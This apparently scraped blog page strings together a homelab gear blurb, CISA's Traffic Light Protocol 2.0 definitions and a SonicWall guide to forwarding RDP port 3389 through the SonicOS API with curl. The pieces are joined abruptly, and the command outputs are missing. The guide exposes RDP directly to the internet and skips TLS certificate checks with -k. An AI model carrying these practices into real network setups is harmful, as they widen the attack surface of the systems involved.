Here is some of the gear I use in my Homelab. I highly recommend each of them.

The full list of server components I use can be found on my Equipment List page.

Source :
https://smarthomepursuits.com/how-to-install-kimai-time-tracking-app-in-docker/

Traffic Light Protocol (TLP) Definitions and Usage

CISA currently uses Traffic Light Protocol (TLP) according to the FIRST Standard Definitions and Usage Guidance, TLP Version 2.0. Note: On Nov. 1, 2022, CISA officially adopted TLP 2.0; however, CISA’s Automated Indicator Sharing (AIS) capability will not update from TLP 1.0 to TLP 2.0 until March 2023. This exception includes AIS’s use of the following open standards: the Structured Threat Information Expression (STIX™) for cyber threat indicators and defensive measures information and the Trusted Automated Exchange of Intelligence Information (TAXII™) for machine-to-machine communications.

In addition to the FIRST TLP 2.0 webpage, see CISA’s:


What is TLP?

The Traffic Light Protocol (TLP) was created in order to facilitate greater sharing of information. TLP is a set of designations used to ensure that sensitive information is shared with the appropriate audience. It employs five official marking options to indicate expected sharing boundaries to be applied by the recipient(s). TLP only has five marking options; any designations not listed in this standard are not considered valid by FIRST.

TLP provides a simple and intuitive schema for indicating when and how sensitive information can be shared, facilitating more frequent and effective collaboration. TLP is not a “control marking” or classification scheme. TLP was not designed to handle licensing terms, handling and encryption rules, and restrictions on action or instrumentation of information. TLP labels and their definitions are not intended to have any effect on freedom of information or “sunshine” laws in any jurisdiction.

TLP is optimized for ease of adoption, human readability and person-to-person sharing; it may be used in automated sharing exchanges, but is not optimized for that use.

TLP is distinct from the Chatham House Rule (when a meeting, or part thereof, is held under the Chatham House Rule, participants are free to use the information received, but neither the identity nor the affiliation of the speakers, nor that of any other participant, may be revealed), but the two may be used in conjunction if deemed appropriate by participants in an information exchange.

The source is responsible for ensuring that recipients of TLP information understand and can follow TLP sharing guidance.

If a recipient needs to share the information more widely than indicated by the original TLP designation, they must obtain explicit permission from the original source.

How do I determine appropriate TLP designation?

TLP:RED – Not for disclosure, restricted to participants only.
When should it be used? Sources may use TLP:RED when information cannot be effectively acted upon without significant risk for the privacy, reputation, or operations of the organizations involved. For the eyes and ears of individual recipients only, no further.
How may it be shared? Recipients may not share TLP:RED information with any parties outside of the specific exchange, meeting, or conversation in which it was originally disclosed. In the context of a meeting, for example, TLP:RED information is limited to those present at the meeting. In most circumstances, TLP:RED should be exchanged verbally or in person.

TLP:AMBER+STRICT – Limited disclosure, restricted to participants’ organization.
When should it be used? Sources may use TLP:AMBER+STRICT when information requires support to be effectively acted upon, yet carries risk to privacy, reputation, or operations if shared outside of the organization.
How may it be shared? Recipients may share TLP:AMBER+STRICT information only with members of their own organization on a need-to-know basis to protect their organization and prevent further harm.

TLP:AMBER – Limited disclosure, restricted to participants’ organization and its clients (see Terminology Definitions).
When should it be used? Sources may use TLP:AMBER when information requires support to be effectively acted upon, yet carries risk to privacy, reputation, or operations if shared outside of the organizations involved. Note that TLP:AMBER+STRICT should be used to restrict sharing to the recipient organization only.
How may it be shared? Recipients may share TLP:AMBER information with members of their own organization and its clients on a need-to-know basis to protect their organization and its clients and prevent further harm.

TLP:GREEN – Limited disclosure, restricted to the community.
When should it be used? Sources may use TLP:GREEN when information is useful to increase awareness within their wider community.
How may it be shared? Recipients may share TLP:GREEN information with peers and partner organizations within their community, but not via publicly accessible channels. Unless otherwise specified, TLP:GREEN information may not be shared outside of the cybersecurity or cyber defense community.

TLP:CLEAR – Disclosure is not limited.
When should it be used? Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release.
How may it be shared? Recipients may share this information without restriction. Information is subject to standard copyright rules.

TLP 2.0 Terminology Definitions

Community

Under TLP, a community is a group who share common goals, practices, and informal trust relationships. A community can be as broad as all cybersecurity practitioners in a country (or in a sector or region).

Organization

Under TLP, an organization is a group who share a common affiliation by formal membership and are bound by common policies set by the organization. An organization can be as broad as all members of an information sharing organization, but rarely broader.

Clients

Under TLP, clients are those people or entities that receive cybersecurity services from an organization. Clients are by default included in TLP:AMBER so that the recipients may share information further downstream in order for clients to take action to protect themselves. For teams with national responsibility, this definition includes stakeholders and constituents. Note: CISA considers “clients” to be stakeholders and constituents that have a legal agreement with CISA.

Usage

How to use TLP in email

TLP-designated email correspondence should indicate the TLP color of the information in the Subject line and in the body of the email, prior to the designated information itself. The TLP color must be in capital letters: TLP:RED, TLP:AMBER+STRICT, TLP:AMBER, TLP:GREEN, or TLP:CLEAR.
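For instance, an illustrative TLP:AMBER email (my own example, not from the CISA text) might begin:

Subject: TLP:AMBER - Indicators for ongoing phishing campaign

TLP:AMBER

[designated information follows]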

How to use TLP in documents

TLP-designated documents should indicate the TLP color of the information in the header and footer of each page. To avoid confusion with existing control marking schemes, it is advisable to right-justify TLP designations. The TLP color should appear in capital letters and in 12 point type or greater. Note: TLP 2.0 has changed the color coding of TLP:RED to accommodate individuals with low vision.

RGB:
TLP:RED : R=255, G=43, B=43, background: R=0, G=0, B=0
TLP:AMBER : R=255, G=192, B=0, background: R=0, G=0, B=0
TLP:GREEN : R=51, G=255, B=0, background: R=0, G=0, B=0
TLP:CLEAR : R=255, G=255, B=255, background: R=0, G=0, B=0

CMYK:
TLP:RED : C=0, M=83, Y=83, K=0, background: C=0, M=0, Y=0, K=100
TLP:AMBER : C=0, M=25, Y=100, K=0, background: C=0, M=0, Y=0, K=100
TLP:GREEN : C=79, M=0, Y=100, K=0, background: C=0, M=0, Y=0, K=100
TLP:CLEAR : C=0, M=0, Y=0, K=0, background: C=0, M=0, Y=0, K=100

Source :
https://www.cisa.gov/tlp

Port Forwarding configured using SonicOS API

Description

This article describes the steps involved in creating policies using SonicOS APIs that will let you access internal devices or servers behind the SonicWall firewall.

Cause

SonicWall by default does not allow inbound traffic that is not part of a session initiated by an internal device on the network. This is done to protect the devices on the internal network from malicious access. If required, certain parts of the network can be opened to external access, for example web servers, Exchange servers, and so on.

To open the network, we need to specify an access rule from the external network to the internal network and a NAT policy so that traffic is directed only to the intended device.

With APIs, this can be achieved at scale: for example, you can create multiple access rules and NAT policies with one command, with all the attributes specified as JSON objects.

Resolution

Manually opening ports / enabling port forwarding to allow traffic from the Internet to a server behind the SonicWall using the SonicOS API involves the following steps:

Step 1: Enabling the API Module.

Step 2: Getting into Swagger.

Step 3: Login to the SonicWall with API.

Step 4: Create Address Objects and Service Objects with API.

Step 5: Creating NAT Policy with API.

Step 6: Creating Access Rules with API.

Step 7: Committing all the configuration changes made with APIs.

Step 8: Log out of the SonicWall with API.

Scenario Overview

The following walk-through details allowing TCP 3389 from the Internet to a terminal server on the local network. Once the configuration is complete, Internet users can RDP into the terminal server using the WAN IP address. Although the examples below show the LAN zone and TCP 3389, they can apply to any zone and any port that is required.

Step 1: Enabling the API Module

  1. Log into the SonicWall GUI.
  2. Click Manage in the top navigation menu.
  3. Click Appliance | Base Settings.
  4. Under Base Settings, search for SonicOS API.
  5. Click Enable SonicOS API.
  6. Click Enable RFC-2617 HTTP Basic Access authentication.
Enabling API on the SonicOS

Step 2: Getting into Swagger

  1. Click on the Manage tab.
  2. Scroll down to find API.
  3. Click on the link https://sonicos-api.sonicwall.com.
  4. Swagger will prepopulate your SonicWall’s IP, management port, and firmware version so it can give you a list of applicable APIs.

 NOTE: All the APIs required for configuring port forwarding are listed in this article.

API on the SonicOS

Step 3: Login to the SonicWall with API

  1.  curl -k -i -u "admin:password" -X POST https://192.168.168.168:443/api/sonicos/auth

      "admin:password" – Replace this with your SonicWall’s username:password.

      https://192.168.168.168:443/ – Replace this with your SonicWall’s public or private IP address.

The command output should contain the string: "success": true

Login with API

 NOTE: You are free to choose Swagger, Postman, Git Bash, or any application that allows API calls. If you are using a Linux-based operating system, you can execute cURL from the terminal. For this article, I am using Git Bash on Windows.
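One practical note, which is an assumption on my part rather than something stated in the original article: each curl invocation is a separate HTTP session, so with RFC-2617 Basic Access authentication enabled you may need to repeat -u "admin:password" on the subsequent calls as well. For example, a call like the following (shown on the assumption that your firmware exposes a GET on /config/pending) would check for uncommitted changes while authenticating inline:

curl -k -i -u "admin:password" -X GET https://192.168.168.168:443/api/sonicos/config/pending -H "accept: application/json"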

Step 4: Create Address Objects and Service Objects with API

  1.   curl -k -i -X POST "https://192.168.168.168:443/api/sonicos/address-objects/ipv4" -H "accept: application/json" -H "Content-Type: application/json" -d "{\"address_object\":{\"ipv4\":{\"name\":\"Term Server Private\",\"zone\":\"LAN\",\"host\":{\"ip\":\"192.168.168.10\"}}}}"  &&  curl -k -i -X POST "https://192.168.168.168:443/api/sonicos/address-objects/ipv4" -H "accept: application/json" -H "Content-Type: application/json" -d "{\"address_object\":{\"ipv4\":{\"name\":\"Term Server Public\",\"zone\":\"WAN\",\"host\":{\"ip\":\"1.1.1.1\"}}}}"

 OR 

curl -k -i -X POST "https://192.168.168.168:443/api/sonicos/address-objects/ipv4" -H "accept: application/json" -H "Content-Type: application/json" -d @add.Json

@add.Json is a file with the following information:

{
  "address_objects": [
    {
      "ipv4": {
        "name": "Term Server Private",
        "zone": "LAN",
        "host": {
          "ip": "192.168.168.10"
        }
      }
    },
    {
      "ipv4": {
        "name": "Term Server Public",
        "zone": "WAN",
        "host": {
          "ip": "1.1.1.1"
        }
      }
    }
  ]
}

Output of the first command, where we passed the address object data on the command line instead of creating a separate file:


Output of the second command, where we used the @add.Json file instead of specifying the data on the command line:


 TIP: If you are creating only one address object, the first command should be sufficient; if you are creating multiple address objects, the second command should be used.

 CAUTION: I have the add.Json file saved to my desktop, hence I was able to reference it in the command. If you created the Json file in a different location, make sure you execute the command from that location.

2. Adding the service object:

 curl -k -i -X POST "https://192.168.168.168:443/api/sonicos/service-objects" -H "accept: application/json" -H "Content-Type: application/json" -d @serviceobj.Json

https://192.168.168.168:443 – Replace that with the IP of the SonicWall

@serviceobj.Json is a file that contains the Attributes of the service object:

{
  "service_object": {
    "name": "Terminal Server 3389",
    "TCP": {
      "begin": 3389,
      "end": 3389
    }
  }
}

Output of the command:


 3. Committing the changes made to the SonicWall: we need to do this to be able to use the address objects and service objects we just created in a NAT policy and an access rule.

  curl -k -X POST "https://192.168.168.168:443/api/sonicos/config/pending" -H "accept: application/json"

  https://192.168.168.168:443 – Replace that with the IP of the SonicWall

Output of the command: 


Step 5: Creating NAT Policy with API

1.     curl -k -i -X POST "https://192.168.168.168:443/api/sonicos/nat-policies/ipv4" -H "accept: application/json" -H "Content-Type: application/json" -d @natpolicy.Json

         https://192.168.168.168:443 – Replace that with the IP of the SonicWall.

         @natpolicy.Json is a file that contains the attributes of the NAT policy:

{
  "nat_policies": [
    {
      "ipv4": {
        "name": "Inbound NAT 3389",
        "enable": true,
        "comment": "",
        "inbound": "X1",
        "outbound": "any",
        "source": {
          "any": true
        },
        "translated_source": {
          "original": true
        },
        "destination": {
          "name": "Term Server Public"
        },
        "translated_destination": {
          "name": "Term Server Private"
        },
        "service": {
          "name": "Terminal Server 3389"
        },
        "translated_service": {
          "original": true
        }
      }
    }
  ]
}

Output of the command:


Step 6: Creating Access Rules with API

1.     curl -k -X POST "https://192.168.168.168:443/api/sonicos/access-rules/ipv4" -H "accept: application/json" -H "Content-Type: application/json" -d @accessrule.Json

https://192.168.168.168:443 – Replace that with the IP of the SonicWall.

@accessrule.Json is a file that contains the attributes of the access rule:

{
  "access_rules": [
    {
      "ipv4": {
        "name": "Inbound 3389",
        "enable": true,
        "from": "WAN",
        "to": "LAN",
        "action": "allow",
        "source": {
          "address": {
            "any": true
          },
          "port": {
            "any": true
          }
        },
        "service": {
          "name": "Terminal Server 3389"
        },
        "destination": {
          "address": {
            "name": "Term Server Public"
          }
        }
      }
    }
  ]
}

Output of the command:


Step 7: Committing all the configuration changes made with APIs

1.     We have already committed the address objects and service objects in Step 4. In this step, we are committing the NAT policy and the access rule to the SonicWall’s configuration:

curl -k -X POST "https://192.168.168.168:443/api/sonicos/config/pending" -H "accept: application/json"

https://192.168.168.168:443 – Replace that with the IP of the SonicWall.

We have only used the POST method in most of the API calls in this article because we are only adding things to the configuration; there are other methods like GET, DELETE, and PUT, as shown in the example below. I recommend that you go through https://sonicos-api.sonicwall.com for more API commands.
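As an illustration (my own example, not from the original article, though the endpoint mirrors the POST used in Step 4), a GET call lists the IPv4 address objects you created:

curl -k -u "admin:password" -X GET "https://192.168.168.168:443/api/sonicos/address-objects/ipv4" -H "accept: application/json"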

Step 8: Log out of the SonicWall with API

1.       It is recommended to log out from the SonicWall via API once the desired configuration is committed.

         curl -k -i -u "admin:password" -X DELETE https://192.168.168.168:443/api/sonicos/auth

         https://192.168.168.168:443 – Replace that with the IP of the SonicWall.

         "admin:password" – The actual username and password for the SonicWall.

Output of the command:


 CAUTION: If you skip the commit in Step 7 and execute the logout command in Step 8, you will lose all the configuration changes made in the current session.

Summary: We have successfully configured port forwarding using the SonicOS API, allowing a user on the Internet to access a terminal server behind the firewall on port 3389.

 NOTE: It is always recommended to use a client VPN for RDP connections; this article is just an example.


Source :
https://www.sonicwall.com/support/knowledge-base/port-forwarding-with-sonicos-api-using-postman-and-curl/190224162643523/
